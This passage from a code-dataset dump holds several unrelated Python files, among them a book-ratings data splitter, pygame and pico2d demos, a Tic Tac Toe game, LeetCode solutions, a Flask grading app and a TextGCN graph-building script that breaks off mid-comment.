\"publisher\": \"publisher\",\n \"categories\": \"categories\",\n \"image\": \"image_url\",\n }\n )\n books = books.sample(frac=fraction, random_state=seed)\n train_size = int(len(books) * train)\n validation_size = int(len(books) * validation)\n train_books = books[:train_size]\n validation_books = books[train_size : train_size + validation_size]\n test_books = books[train_size + validation_size :]\n train_ratings = ratings[ratings[\"book_id\"].isin(train_books[\"book_id\"])]\n validation_ratings = ratings[ratings[\"book_id\"].isin(validation_books[\"book_id\"])]\n test_ratings = ratings[ratings[\"book_id\"].isin(test_books[\"book_id\"])]\n return (\n train_ratings,\n validation_ratings,\n test_ratings,\n train_books,\n validation_books,\n test_books,\n )\n\n\n@click.command()\n@click.option(\"--data_path\", default=\"data/01_raw/\")\n@click.option(\"--destination_path\", default=\"data/02_intermediate/\")\n@click.option(\"--ratings_file\", default=\"Books_rating.csv\")\n@click.option(\"--books_file\", default=\"books_data.csv\")\n@click.option(\"--dont_remove_description\", is_flag=True, default=False)\n@click.option(\"--dont_remove_publisher\", is_flag=True, default=False)\n@click.option(\"--dont_remove_author\", is_flag=True, default=False)\n@click.option(\"--dont_remove_title\", is_flag=True, default=False)\n@click.option(\"--dont_remove_category\", is_flag=True, default=False)\n@click.option(\"--train\", default=0.7)\n@click.option(\"--validation\", default=0.2)\n@click.option(\"--test\", default=0.1)\n@click.option(\"--verbose\", is_flag=True, default=False)\n@click.option(\"--fraction\", default=1.0)\n@click.option(\"--seed\", default=42)\ndef main(\n data_path,\n destination_path,\n ratings_file,\n books_file,\n dont_remove_description,\n dont_remove_publisher,\n dont_remove_author,\n dont_remove_title,\n dont_remove_category,\n train,\n validation,\n test,\n verbose,\n fraction,\n seed,\n):\n data_path = Path(data_path)\n if verbose:\n print(\"Reading data\")\n ratings = read_ratings(data_path / ratings_file)\n books = read_books(data_path / books_file)\n if verbose:\n print(\"Filtering data\")\n ratings, books = filter_data(\n ratings,\n books,\n remove_no_description=not dont_remove_description,\n remove_no_publisher=not dont_remove_publisher,\n remove_no_author=not dont_remove_author,\n remove_no_title=not dont_remove_title,\n remove_no_category=not dont_remove_category,\n )\n if verbose:\n print(\"Splitting data\")\n (\n train_ratings,\n validation_ratings,\n test_ratings,\n train_books,\n validation_books,\n test_books,\n ) = split_data_by_books(\n ratings,\n books,\n train=train,\n validation=validation,\n test=test,\n seed=seed,\n fraction=fraction,\n )\n if verbose:\n print(\"Saving data\")\n destination_path = Path(destination_path)\n train_ratings.to_csv(destination_path / \"train_ratings.csv\", index=False)\n validation_ratings.to_csv(destination_path / \"validation_ratings.csv\", index=False)\n test_ratings.to_csv(destination_path / \"test_ratings.csv\", index=False)\n train_books.to_csv(destination_path / \"train_books.csv\", index=False)\n validation_books.to_csv(destination_path / \"validation_books.csv\", index=False)\n test_books.to_csv(destination_path / \"test_books.csv\", index=False)\n if verbose:\n print(f\"train_ratings size: {len(train_ratings)}\")\n print(f\"validation_ratings size: {len(validation_ratings)}\")\n print(f\"test_ratings size: {len(test_ratings)}\")\n print(f\"train_books size: {len(train_books)}\")\n print(f\"validation_books size: {len(validation_books)}\")\n print(f\"test_books size: {len(test_books)}\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Jakub-Kucinski/amazon-books-coldstart","sub_path":"src/amazon_books_coldstart/data_preprocessing/pandas_preprocessing.py","file_name":"pandas_preprocessing.py","file_ext":"py","file_size_in_byte":5877,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"23123972430","text":"from __future__ import absolute_import\n\n\nclass Send:\n def __init__(self, url, id, action, type, ins_id, config,floating_ip):\n self.url = url\n self.id = id\n self.action = action\n self.type = type\n self.ins_id = ins_id\n self.config = config\n self.floating_ip = floating_ip\n\n\nclass Recv:\n def __init__(self, json_id, ins_id, content):\n self.json_id = json_id \n self.ins_id = ins_id\n self.content = content\n\nsend_list = []\nrecv_list = []\nthread_list = []\n","repo_name":"wangjunxiao/SDNCloud","sub_path":"sdntestbed_source/sdntestbed/python/novaconsole-master/build/lib.linux-x86_64-2.7/novaconsole/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"1331806340","text":"from pico2d import *\n\nTUK_WIDTH, TUK_HEIGHT = 800, 600\nopen_canvas(TUK_WIDTH, TUK_HEIGHT)\nTUK_ground = load_image('TUK_GROUND.png')\ncharacter = load_image('animation_sheet.png')\nhand = load_image('hand_arrow.png')\ndir_check = 0\nhand_x, hand_y, hand_check = [], [], []\n\ndef handle_events():\n global running\n global x, y\n events = get_events()\n for event in events:\n if event.type == SDL_QUIT:\n running = False\n elif event.type == SDL_MOUSEBUTTONDOWN:\n hand_x.append(event.x)\n hand_y.append(TUK_HEIGHT - 1 - event.y)\n if x > event.x:\n hand_check.append(1)\n else:\n hand_check.append(2)\n elif event.type == SDL_KEYDOWN and event.key == SDLK_ESCAPE:\n running = False\n\nrunning = True\nx, y = TUK_WIDTH // 2, TUK_HEIGHT // 2\nframe, idx = 0, 0\nsave_x, save_y = x, y\n\nwhile running:\n clear_canvas()\n TUK_ground.draw(TUK_WIDTH // 2, TUK_HEIGHT // 2)\n for i in range(0, len(hand_check)):\n if hand_check[i] == 1 or hand_check[i] == 2:\n hand.draw(hand_x[i], hand_y[i])\n\n if len(hand_check) > 0:\n if hand_check[0] == 1:\n character.clip_draw(frame * 100, 100 * 0, 100, 100, x, y)\n elif hand_check[0] == 2:\n character.clip_draw(frame * 100, 100 * 1, 100, 100, x, y)\n\n t = idx / 500\n x = (1 - t) * save_x + t * hand_x[0]\n y = (1 - t) * save_y + t * hand_y[0]\n idx += 1\n if idx >= 500:\n idx = 0\n save_x, save_y = x, y\n hand_x.pop(0), hand_y.pop(0), hand_check.pop(0)\n else:\n character.clip_draw(frame * 100, 100 * 0, 100, 100, x, y)\n\n update_canvas()\n frame = (frame + 1) % 8\n handle_events()\n\nclose_canvas()\n","repo_name":"hgfsda/Drill06","sub_path":"move_character_with_mouse.py","file_name":"move_character_with_mouse.py","file_ext":"py","file_size_in_byte":1772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"20264362589","text":"'''\nGiven an array nums and a value val, remove all instances of that value in-place and return the new length.\n\nExample 1:\n\nGiven nums = [3,2,2,3], val = 3,\n\nYour function should return length = 2, with the first two elements of nums being 2.\n\nIt doesn't matter what you leave beyond the returned length.\n'''\n\n'''\nBrute force: go through the array, check if the value match \nthe target, remove that value => long runtime cause of the remove method \n\n2 Pointers method:\nset 2 pointers p1, p2 at the beginning of the list\nLoop through the nums list,\nIf p1 meet a value that not target, nums[p2] == nums[p1] then increase p2 by 1\nKeep doing that till reaching the end of the list.\nReturn the value of p2 \n[0,1,3,0,4,0,4,2] \n i\n s\n'''\n\n\ndef removeElement(nums, val):\n l = len(nums)\n s = 0\n for i in range(l):\n if nums[i] != val:\n nums[s] = nums[i]\n s += 1\n return s\n","repo_name":"bghoang/coding-challenge-me","sub_path":"leetcode/TwoPointerMethod/removeElement.py","file_name":"removeElement.py","file_ext":"py","file_size_in_byte":928,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"15714208629","text":"# -*- coding: utf-8 -*-\n\nimport pygame\nfrom enum import Enum\n\nclass PGAction(Enum):\n CLICKED = 1\n OVER = 0\n\nclass PGElement:\n priority = 0\n surface = None\n rect = pygame.Rect((0,0,0,0))\n visible = True\n overed = False\n\n def event_check(self, events: list):\n for event in events:\n if event.type == pygame.MOUSEBUTTONUP and event.button == 1: \n if self.rect.collidepoint(event.pos):\n return PGAction.CLICKED\n if event.type == pygame.MOUSEMOTION:\n if self.rect.collidepoint(event.pos):\n self.overed = True\n else:\n self.overed = False\n return None\n\n def draw(self, screen: pygame.Surface, frame_count: int):\n if self.visible:\n screen.blit(self.surface, (self.rect[0], self.rect[1]))\n \n def _relative_to_absolute(self, rel_rect):\n \"\"\" Return absolute coordinate based on relative coordinate and display size\"\"\"\n display_info = pygame.display.Info()\n current_w = display_info.current_w\n current_h = display_info.current_h\n transform_v = (current_w, current_h,current_w, current_h)\n abs_rect = pygame.Rect(tuple((ratio * transform_v[i] for i, ratio in enumerate(rel_rect))))\n return abs_rect\n\n def _resize(self, new_size, absolute = True):\n display_info = pygame.display.Info()\n current_w = display_info.current_w\n current_h = display_info.current_h\n if not absolute:\n new_w = int(new_size[0] * current_w)\n new_h = int(new_size[1] * current_h)\n new_size = (new_w, new_h)\n self.surface = pygame.transform.scale(self.surface, new_size)\n\nclass PGEmptyButton(PGElement):\n def __init__(self, rect, absolute = True):\n self.rect = pygame.Rect(rect)\n if not absolute:\n self.rect = pygame.Rect((self._relative_to_absolute(rect)))\n self.visible = False\n \n def draw(self, screen, frame_count):\n if self.visible:\n pygame.draw.rect(screen, (0,0,0), self.rect, 3)\n\nclass PGImage(PGElement):\n priority = 1\n def __init__(self, path: str, rect, absolute: bool = True):\n self.surface = pygame.image.load(path)\n self.rect = pygame.Rect(rect)\n if not absolute:\n self.rect = pygame.Rect((self._relative_to_absolute(rect)))\n self._resize((rect[2], rect[3]), absolute)\n \n\nclass PGLabel(PGElement):\n priority = 2\n def __init__(self, location: tuple, text: str = \"\", font_size: int = 8, font = None, color=(0,0,0), absolute: bool = False):\n font = pygame.font.Font(font, font_size)\n self.surface = font.render(text, 1, color)\n self.rect = location + (self.surface.get_size())\n if not absolute:\n self.rect = pygame.Rect(self._relative_to_absolute(self.rect))\n\nclass PGBackground(PGElement):\n def __init__(self, location):\n self.surface = pygame.image.load(location)\n displayInfo = pygame.display.Info()\n self.surface = pygame.transform.scale(self.surface, (displayInfo.current_w, displayInfo.current_h))\n self.rect = (0,0) + (displayInfo.current_w, displayInfo.current_h)\n\n\ndef drawElements(screen, elements, frame_count: int = 0):\n \"\"\" Draw given element on screen base on their priority value \"\"\"\n screen.fill((255,255,255))\n for element in sorted(elements, key=lambda x: x.priority):\n element.draw(screen, frame_count)\n pygame.display.flip()","repo_name":"CENSONtechnology/linto-wuw-booth","sub_path":"pgelement.py","file_name":"pgelement.py","file_ext":"py","file_size_in_byte":3562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"74364475618","text":"from IPython.display import clear_output\r\n\r\nimport random\r\n\r\ndef display_board(board):\r\n\t\"\"\"\r\n\tprint board game\r\n\t\"\"\"\r\n\t#clear_output()\r\n\tprint(board[7] + ' | ' + board[8] + ' | ' + board[9])\r\n\tprint('---------')\r\n\tprint(board[4] + ' | ' + board[5] + ' | ' + board[6])\r\n\tprint('---------')\r\n\tprint(board[1] + ' | ' + board[2] + ' | ' + board[3])\r\n\tprint('\\n\\n')\r\n\r\ndef player_input():\r\n\t\"\"\"\r\n\tWrite a function that can take in a player input and assign their marker as 'X' or 'O'\r\n\t\"\"\"\r\n\tmarkerset = ''\r\n\tmarker = ''\r\n\twhile not (marker == 'X' or marker == 'O'):\r\n\t\tmarker = input('Player 1: Do you want to be X or O?').upper()\r\n\t\tif(marker == 'X'):\r\n\t\t\tmarkerset = ('X','O')\r\n\t\telse:\r\n\t\t\tmarkerset = ('O','X')\r\n\tclear_output()\r\n\tprint(f'Player 1: Do you want to be X or O? {markerset[0]}')\r\n\tprint(f'Player 2: Do you want to be X or O? {markerset[1]}')\r\n\treturn markerset\r\n\r\ndef place_marker(board, marker, position):\r\n\t\"\"\"\r\n\tfunction that takes in the board list object, a marker ('X' or 'O'), and a desired position (number 1-9) and assigns it to the board.\r\n\t\"\"\"\r\n\tboard[position] = marker\r\n\r\ndef win_check(board, mark):\r\n\t\"\"\"\r\n\tfunction that takes in a board and a mark (X or O) and then checks to see if that mark has won.\r\n\t\"\"\"\r\n\treturn ((board[1] == mark and board[2] == mark and board[3] == mark) or\r\n\t(board[4] == mark and board[5] == mark and board[6] == mark) or\r\n\t(board[7] == mark and board[8] == mark and board[9] == mark) or\r\n\t(board[1] == mark and board[5] == mark and board[9] == mark) or\r\n\t(board[7] == mark and board[5] == mark and board[3] == mark))\r\n\r\ndef choose_first():\r\n\t\"\"\"\r\n\trandomly decide which player goes first\r\n\t\"\"\"\r\n\tfirst = random.randint(1,2)\r\n\tprint(f'Player {first} will go first')\r\n\treturn first\r\n\r\ndef space_check(board, position):\r\n\t\"\"\"\r\n\tfunction that returns a boolean indicating whether a space on the board is freely available.\r\n\t\"\"\"\r\n\treturn (board[position] == ' ')\r\n\r\ndef full_board_check(board):\r\n\t\"\"\"\r\n\t function that checks if the board is full and returns a boolean value\r\n\t\"\"\"\r\n\tfor x in range(1,10):\r\n\t\tif(space_check(board,x) == True):\r\n\t\t\treturn False\r\n\treturn True\r\n\r\ndef player_choice(board):\r\n\t\"\"\"\r\n\t function that asks for a player's next position and see if the position is available\r\n\t\"\"\"\r\n\twhile(True):\r\n\t\tpos = int(input('Choose your next position (1-9)'))\r\n\t\tif(space_check(board,pos)==True):\r\n\t\t\treturn pos\r\n\t\telse:\r\n\t\t\tcontinue\r\n\r\ndef replay():\r\n\t\"\"\"\r\n\tfunction that asks the player if they want to play again\r\n\t\"\"\"\r\n\twhile(True):\r\n\t\treplay = input('Do you want to play again? Y/N')\r\n\t\tif(replay.lower() == 'y'):\r\n\t\t\tclear_output()\r\n\t\t\treturn True\r\n\t\telif(replay.lower() == 'n'):\r\n\t\t\tclear_output()\r\n\t\t\treturn False\r\n\t\telse:\r\n\t\t\tcontinue\r\n\r\n\r\n#GAME\r\n\r\nprint('Welcome to Tic Tac Toe!')\r\n\r\nwhile True:\r\n # Set the game up here\r\n board = [' '] * 10\r\n markset = player_input()\r\n first = choose_first()\r\n \r\n play = input(print('Are you ready to Play? Y/N'))\r\n if(play.lower() == 'y'):\r\n game_on = True\r\n else:\r\n game_on = False\r\n \r\n #pass\r\n while game_on:\r\n if(first == 1):\r\n #Player 1 Turn\r\n display_board(board)\r\n pos = player_choice(board)\r\n place_marker(board,markset[0],pos)\r\n if(win_check(board,markset[0])==True):\r\n display_board(board)\r\n print('Yayyy Player1!! You\\'ve won the game!')\r\n game_on = False\r\n else:\r\n if(full_board_check(board) == True):\r\n display_board(board)\r\n print('It\\'s a draw!!')\r\n game_on = False\r\n else:\r\n first = 2\r\n else:\r\n \r\n # Player2's turn.\r\n display_board(board)\r\n pos = player_choice(board)\r\n place_marker(board,markset[1],pos)\r\n if(win_check(board,markset[1])==True):\r\n display_board(board)\r\n print('Yayyy Player2!! You\\'ve won the game!')\r\n game_on = False\r\n else:\r\n if(full_board_check(board)==True):\r\n display_board(board)\r\n print('It\\'s a draw!!')\r\n game_on = False\r\n else:\r\n first = 1\r\n #pass\r\n #print('Yayyy Player{first}!! You\\'ve won the game!')\r\n if (replay()==False):\r\n break","repo_name":"GurpartapG/TikTacToe","sub_path":"TIkTakToe.py","file_name":"TIkTakToe.py","file_ext":"py","file_size_in_byte":4419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"14974598646","text":"\"\"\"\nYour task is to calculate ab mod 1337 where a is a positive integer and b is an extremely large positive integer given in the form of an array.\n\nExample1:\n\na = 2\nb = [3]\n\nResult: 8\nExample2:\n\na = 2\nb = [1,0]\n\nResult: 1024\nCredits:\nSpecial thanks to @Stomach_ache for adding this problem and creating all test cases.\n\"\"\"\n\nclass Solution:\n def superPow(self, a, b):\n \"\"\"\n :type a: int\n :type b: List[int]\n :rtype: int\n \"\"\"\n result = 1\n for n in b[::-1]:\n result = result * a ** n % 1337\n a = a ** 10 % 1337\n return result","repo_name":"ipudu/leetcode","sub_path":"solutions/372_super-pow.py","file_name":"372_super-pow.py","file_ext":"py","file_size_in_byte":604,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"34"} +{"seq_id":"11514656045","text":"from shutil import rmtree\n\nfrom blob_operations import Blob_Operation\n\nfrom utils.logger import App_Logger\nfrom utils.read_params import read_params\n\n\nclass Main_Utils:\n def __init__(self):\n self.class_name = self.__class__.__name__\n\n self.blob = Blob_Operation()\n\n self.log_writer = App_Logger()\n\n self.config = read_params()\n\n self.log_dir = self.config[\"log_dir\"]\n\n self.dir = self.config[\"dir\"]\n\n def upload_logs(self):\n method_name = self.upload_logs.__name__\n\n self.log_writer.start_log(\"start\", self.class_name, method_name, \"upload\")\n\n try:\n self.blob.upload_folder(self.log_dir, \"upload\")\n\n self.log_writer.log(\"Uploaded logs to logs container\", \"upload\")\n\n self.log_writer.start_log(\"exit\", self.class_name, method_name, \"upload\")\n\n rmtree(self.log_dir)\n\n except Exception as e:\n self.log_writer.exception_log(e, self.class_name, method_name, \"upload\")\n\n def get_filename(self, key, fname, log_file):\n method_name = self.get_filename.__name__\n\n self.log_writer.start_log(\"start\", self.class_name, method_name, log_file)\n\n try:\n pred_fname = self.dir[key] + \"/\" + fname\n\n self.log_writer.log(f\"Got the pred file name for {key}\", log_file)\n\n self.log_writer.start_log(\"exit\", self.class_name, method_name, log_file)\n\n return pred_fname\n\n except Exception as e:\n self.log_writer.exception_log(e, self.class_name, method_name, log_file)\n","repo_name":"sethusaim/Visibility-Climate-Kubernetes-Azure","sub_path":"raw_pred_data_validation/utils/main_utils.py","file_name":"main_utils.py","file_ext":"py","file_size_in_byte":1560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"72551365218","text":"import csv\nimport json\n\nfrom model import preprocess_text\nfrom flask import Flask, request, jsonify, render_template\nimport pickle\n\napp = Flask(__name__)\n\n\n@app.route('/')\ndef home():\n # Read questions from the CSV file\n questions = []\n with open('questions.csv', 'r') as file:\n reader = csv.DictReader(file)\n for row in reader:\n questions.append(row['question'])\n\n return render_template('index.html', questions=questions)\n\n\n# Load the pickled model\nwith open('model.pkl', 'rb') as file:\n model = pickle.load(file)\n\n\n# Define the route for handling predictions\n@app.route('/predict', methods=['POST'])\ndef predict():\n # Retrieve the answers from the request\n answers = request.json['answers']\n\n # Preprocess the answers\n preprocessed_answers = [preprocess_text(answer) for answer in answers]\n\n # Make predictions using the model\n results = []\n for answer, preprocessed_answer in zip(answers, preprocessed_answers):\n prediction = model.predict([preprocessed_answer]) # Pass the processed answer as a list\n prediction_list = prediction.tolist() # Convert NumPy array to list\n results.append((answer, prediction_list))\n\n # Return the results as JSON\n return json.dumps(results)\n\n\n# Define the route for rendering the HTML page\n\nif __name__ == '__main__':\n app.run()\n","repo_name":"Abdelbar-Terbachi/Arabic-answer-grading-model","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"74453785377","text":"import time\n\nfrom graph.algorithms import ColorDirectedGraph\nfrom parametrized.helpers.HOPermutationSignatures import HOPermutationSignatures\nfrom parametrized.helpers.PermutationSignatureApplier import PermutationSignatureApplier\n\n\nclass BruteColoringAlgorithm:\n def __init__(self):\n pass\n\n def run(self, original_graph):\n cyclic_graphs = 0\n acyclic_graphs = 0\n # count = -1\n\n minimum_chromatic_number = None\n minimum_permutation_signature = None\n\n permutations = HOPermutationSignatures(original_graph)\n undirected_edges = original_graph.vertex_tuples_to_edges.keys()\n\n for perm in permutations:\n # count += 1\n # print(f\"\\rPermutation {count}/{2 ** (len(perm)) - 1}\", end='')\n with PermutationSignatureApplier(original_graph, perm, undirected_edges):\n is_acyclic, topological_sort = original_graph.is_acyclic()\n\n ColorDirectedGraph().run(topological_sort)\n\n if is_acyclic:\n ColorDirectedGraph().run(topological_sort)\n acyclic_graphs += 1\n else:\n cyclic_graphs += 1\n continue\n\n chromatic_numer = original_graph.tags_to_vertices['t'].get_color()\n # print(f'Chromatic number: {chromatic_numer}')\n\n if not minimum_chromatic_number or chromatic_numer < minimum_chromatic_number:\n minimum_chromatic_number = chromatic_numer\n minimum_permutation_signature = perm\n\n # print(\"\\n\")\n # print(f\"{cyclic_graphs} out of {cyclic_graphs + acyclic_graphs} graph(s) was/were cyclic.\")\n # print(\n # f\"Minimum permutation: {minimum_permutation_signature}, it's chromatic number: {minimum_chromatic_number}\")\n\n with PermutationSignatureApplier(original_graph, minimum_permutation_signature, undirected_edges):\n order = original_graph.is_acyclic()[1]\n ColorDirectedGraph().run(order)\n","repo_name":"Vilkucis/dw-magr-2023","sub_path":"src/brute/brute.py","file_name":"brute.py","file_ext":"py","file_size_in_byte":2046,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"8318387320","text":"import os\nimport random\nimport numpy as np\nimport pickle as pkl\nimport networkx as nx\nimport scipy.sparse as sp\nfrom utils import loadWord2Vec, clean_str\nfrom math import log\nfrom sklearn import svm\nfrom nltk.corpus import wordnet as wn\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nimport sys\nfrom scipy.spatial.distance import cosine\n\nif len(sys.argv) != 2:\n\tsys.exit(\"Use: python build_graph.py \")\n\ndatasets = ['20ng', 'R8', 'R52', 'ohsumed', 'mr']\n# build corpus\ndataset = sys.argv[1]\n\nif dataset not in datasets:\n\tsys.exit(\"wrong dataset name\")\n\n\n\n\n'''\n************************************\n Does Not Use Read Pre-trained Word Vectors\n************************************\n'''\nword_embeddings_dim = 50\nword_vector_map = {}\n\n\n\n'''\n************************************\n Read Pre-trained Word Vectors\n************************************\n'''\n# word_vector_file = 'data/glove.6B/glove.6B.300d.txt'\n# word_vector_file = 'data/corpus/' + dataset + '_word_vectors.txt'\n# _, embd, word_vector_map = loadWord2Vec(word_vector_file)\n# word_embeddings_dim = len(embd[0])\n\n\n\n\n#******************************************************************************#\n# 1.load the train data and test data, and shuffle them #\n#******************************************************************************#\n# load the sample name of train(test) data\ndoc_name_list = []\ndoc_train_list = []\ndoc_test_list = []\n\nf = open('data/' + dataset + '.txt', 'r')\nlines = f.readlines()\nfor line in lines:\n doc_name_list.append(line.strip())\n temp = line.split(\"\\t\")\n if temp[1].find('test') != -1:\n doc_test_list.append(line.strip())\n elif temp[1].find('train') != -1:\n doc_train_list.append(line.strip())\nf.close()\n\n\n# load the sample content, the sample order in XXX.clean.txt is the same as that of doc_name_list\ndoc_content_list = []\nf = open('data/corpus/' + dataset + '.clean.txt', 'r')\nlines = f.readlines()\nfor line in lines:\n doc_content_list.append(line.strip())\nf.close()\n\n# 找出doc_train_list中各条样本在doc_name_list的下标,并存储在train_ids中,然后对train_ids进行打乱\ntrain_ids = []\nfor train_name in doc_train_list:\n train_id = doc_name_list.index(train_name)\n train_ids.append(train_id)\nrandom.shuffle(train_ids)\n\n# partial labeled data\n#train_ids = train_ids[:int(0.2 * len(train_ids))]\n\n# 将打乱后的train_ids写入文件中\ntrain_ids_str = '\\n'.join(str(index) for index in train_ids)\nf = open('data/' + dataset + '.train.index', 'w')\nf.write(train_ids_str)\nf.close()\n\n# 找出doc_test_list中各条样本在doc_name_list的下标,并存储在test_ids中,然后对test_ids进行打乱\ntest_ids = []\nfor test_name in doc_test_list:\n test_id = doc_name_list.index(test_name)\n test_ids.append(test_id)\n\nrandom.shuffle(test_ids)\n\n# 将打乱后的test_ids写入文件中\ntest_ids_str = '\\n'.join(str(index) for index in test_ids)\nf = open('data/' + dataset + '.test.index', 'w')\nf.write(test_ids_str)\nf.close()\n\n# 变量id存放训练集和测试集的下标\nids = train_ids + test_ids\n\n\n# 根据train_ids和test_ids中打乱后的顺序,对doc_name_list和doc_content_list重新进行排列,分别得到shuffle_doc_name_list、shuffle_doc_words_list\nshuffle_doc_name_list = [] \nshuffle_doc_words_list = []\nfor id in ids:\n shuffle_doc_name_list.append(doc_name_list[int(id)])\n shuffle_doc_words_list.append(doc_content_list[int(id)])\n\n# 将shuffle_doc_name_list、shuffle_doc_words_list写入文件\nshuffle_doc_name_str = '\\n'.join(shuffle_doc_name_list)\nf = open('data/' + dataset + '_shuffle.txt', 'w')\nf.write(shuffle_doc_name_str)\nf.close()\nshuffle_doc_words_str = '\\n'.join(shuffle_doc_words_list)\nf = open('data/corpus/' + dataset + '_shuffle.txt', 'w')\nf.write(shuffle_doc_words_str)\nf.close()\n\n\n#******************************************************************************#\n# 2.build vocabulary #\n#******************************************************************************#\nword_freq = {}\nword_set = set()\nfor doc_words in shuffle_doc_words_list:\n words = doc_words.split()\n for word in words:\n word_set.add(word)\n if word in word_freq:\n word_freq[word] += 1\n else:\n word_freq[word] = 1\n\nvocab = list(word_set)\nvocab_size = len(vocab)\n\nword_doc_list = {} # 字典,key=word,value=包含该word的样本的id(该样本在shuffle_doc_words_list中的id)\nfor i in range(len(shuffle_doc_words_list)):\n doc_words = shuffle_doc_words_list[i]\n words = doc_words.split()\n appeared = set()\n for word in words:\n if word in appeared:\n continue\n if word in word_doc_list:\n doc_list = word_doc_list[word]\n doc_list.append(i)\n word_doc_list[word] = doc_list\n else:\n word_doc_list[word] = [i]\n appeared.add(word)\n\nword_doc_freq = {} # 字典,kye=word, value=包含该word的document数量\nfor word, doc_list in word_doc_list.items():\n word_doc_freq[word] = len(doc_list)\n\nword_id_map = {} # 字典,key=word, value=该word在vocab中的下标\nfor i in range(vocab_size):\n word_id_map[vocab[i]] = i\n\n# 将vocab写入文件\nvocab_str = '\\n'.join(vocab)\nf = open('data/corpus/' + dataset + '_vocab.txt', 'w')\nf.write(vocab_str)\nf.close()\n\n'''\nWord definitions begin\n'''\n'''\ndefinitions = []\n\nfor word in vocab:\n word = word.strip()\n synsets = wn.synsets(clean_str(word))\n word_defs = []\n for synset in synsets:\n syn_def = synset.definition()\n word_defs.append(syn_def)\n word_des = ' '.join(word_defs)\n if word_des == '':\n word_des = ''\n definitions.append(word_des)\n\nstring = '\\n'.join(definitions)\n\n\nf = open('data/corpus/' + dataset + '_vocab_def.txt', 'w')\nf.write(string)\nf.close()\n\ntfidf_vec = TfidfVectorizer(max_features=1000)\ntfidf_matrix = tfidf_vec.fit_transform(definitions)\ntfidf_matrix_array = tfidf_matrix.toarray()\nprint(tfidf_matrix_array[0], len(tfidf_matrix_array[0]))\n\nword_vectors = []\n\nfor i in range(len(vocab)):\n word = vocab[i]\n vector = tfidf_matrix_array[i]\n str_vector = []\n for j in range(len(vector)):\n str_vector.append(str(vector[j]))\n temp = ' '.join(str_vector)\n word_vector = word + ' ' + temp\n word_vectors.append(word_vector)\n\nstring = '\\n'.join(word_vectors)\n\nf = open('data/corpus/' + dataset + '_word_vectors.txt', 'w')\nf.write(string)\nf.close()\n\nword_vector_file = 'data/corpus/' + dataset + '_word_vectors.txt'\n_, embd, word_vector_map = loadWord2Vec(word_vector_file)\nword_embeddings_dim = len(embd[0])\n'''\n\n'''\nWord definitions end\n'''\n\n\n\n\n\n\n\n\n\n#******************************************************************************#\n# 3.记录label的种类 #\n#******************************************************************************#\nlabel_set = set()\nfor doc_meta in shuffle_doc_name_list:\n temp = doc_meta.split('\\t')\n label_set.add(temp[2])\nlabel_list = list(label_set)\n\n# 将label_list写入文件\nlabel_list_str = '\\n'.join(label_list)\nf = open('data/corpus/' + dataset + '_labels.txt', 'w')\nf.write(label_list_str)\nf.close()\n\n\n\n\n\n\n\n\n\n\n\n#******************************************************************************#\n# 4. divide train_set into 90% real_train_set and 10% val_set #\n#******************************************************************************#\n# 从train_ids选择90%作为真正的训练集,剩下的10%作为验证集\ntrain_size = len(train_ids)\nval_size = int(0.1 * train_size)\nreal_train_size = train_size - val_size \n\n# 真正参与训练的训练集的样本名称\nreal_train_doc_names = shuffle_doc_name_list[:real_train_size]\n\n# 将真正参与训练的训练集的样本名称写入文件\nreal_train_doc_names_str = '\\n'.join(real_train_doc_names)\nf = open('data/' + dataset + '.real_train.name', 'w')\nf.write(real_train_doc_names_str)\nf.close()\n\n\n\n#*******************************************************************************************************#\n# 5. 构造模型能够处理的训练集数据\n# x: 矩阵,大小为real_train_size*word_embeddings_dim,每行代表一个document的embedding。 \n# 如果不使用预训练的词向量,则该document的embedding为0。如果使用预训练的词向量,则该\n# document的embedding为该document中各个单词embedding之和。\n# y: 矩阵,大小为real_train_size*len(label_list),每一行代表一个document对应label的one_hot向量\n#*******************************************************************************************************#\n\nrow_x = []\ncol_x = []\ndata_x = []\nfor i in range(real_train_size):\n doc_vec = np.array([0.0 for k in range(word_embeddings_dim)])\n doc_words = shuffle_doc_words_list[i]\n words = doc_words.split()\n doc_len = len(words)\n for word in words:\n if word in word_vector_map: # word_vector_map,字典,是预训练词向量矩阵\n word_vector = word_vector_map[word]\n # print(doc_vec)\n # print(np.array(word_vector))\n doc_vec = doc_vec + np.array(word_vector)\n\n for j in range(word_embeddings_dim):\n row_x.append(i)\n col_x.append(j)\n # np.random.uniform(-0.25, 0.25)\n data_x.append(doc_vec[j] / doc_len) # doc_vec[j]/ doc_len\n\n# x = sp.csr_matrix((real_train_size, word_embeddings_dim), dtype=np.float32)\nx = sp.csr_matrix((data_x, (row_x, col_x)), shape=(real_train_size, word_embeddings_dim))\n\ny = []\nfor i in range(real_train_size):\n doc_meta = shuffle_doc_name_list[i]\n temp = doc_meta.split('\\t')\n label = temp[2]\n one_hot = [0 for l in range(len(label_list))]\n label_index = label_list.index(label)\n one_hot[label_index] = 1\n y.append(one_hot)\ny = np.array(y)\n# print(y)\n\n\n\n\n\n\n\n#*************************************************************************************************#\n# 6. 构造模型能够处理的测试集数据。\n# tx: 矩阵,大小为test_size*word_embeddings_dim,每行代表一个document的embedding。 \n# 如果不使用预训练的词向量,则该document的embedding为0。如果使用预训练的词向量,则该\n# document的embedding为该document中各个单词embedding之和。\n# ty: 矩阵,大小为test_size*len(label_list),每一行代表一个document对应label的one_hot向量\n#*************************************************************************************************#\n\n# tx: feature vectors of test docs, no initial 